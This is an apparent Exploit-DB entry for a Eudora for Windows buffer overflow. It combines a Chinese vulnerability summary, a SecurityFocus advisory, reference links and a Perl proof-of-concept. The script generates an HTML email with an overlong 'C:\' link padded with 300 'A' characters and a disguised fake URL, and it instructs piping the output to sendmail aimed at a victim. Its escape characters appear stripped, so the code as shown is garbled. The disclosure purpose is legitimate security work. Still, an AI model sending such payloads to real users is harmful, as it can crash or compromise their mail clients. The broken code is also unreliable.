https://www.exploit-db.com/exploits/24096
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-046

EudoraforWindows5.2.1，6.0.3，和6.1版本存在缓冲区溢出漏洞。远程攻击者借助包含（1）链接到C驱动器的超长URL或者（2）长附件名的邮件执行任意代码。

source: http://www.securityfocus.com/bid/10298/info

Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability. 

The issue is exposed when an excessively long hyperlink to a file resource is embedded in an HTML e-mail. This may permit remote attackers to execute arbitrary code via malicious e-mail in the context of the client user.

This issue was reported in Eudora on Windows platforms. Eudora for Apple Mac operating systems may be similarly affected, though this has not been confirmed.

#!/usr/bin/perl --
print "From: men";
print "To: youn";
print "Subject: Eudora file URL buffer overflow demon";
print "X-Use: Pipe the output of this script into:  sendmail -i victimnn";
print "The following is a "proper" HTML URL, pointing to somewhere long:n";
print "<x-html>n";
print "<a href="C:\", "A"x300, "">n";
print "Fake URL to http://anywhere/I/want</a>n";
print "</x-html>n";
print "Clicking above will crash Eudora.nn";
print "The following plain-text converted by Eudora into a clickable URLn";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxxn";
print "is for comparison: the user can hardly tell them apart.nn";

来源:BID
名称:10298
链接:http://www.securityfocus.com/bid/10298
来源:SECUNIA
名称:11568
链接:http://secunia.com/advisories/11568
来源:XF
名称:eudora-long-url-bo(16086)
链接:http://xforce.iss.net/xforce/xfdb/16086
来源:www.eudora.com
链接:http://www.eudora.com/download/eudora/windows/6.1.1/RelNotes.txt
来源:BUGTRAQ
名称:20040507EudorafileURLbufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108395487628044&w;=2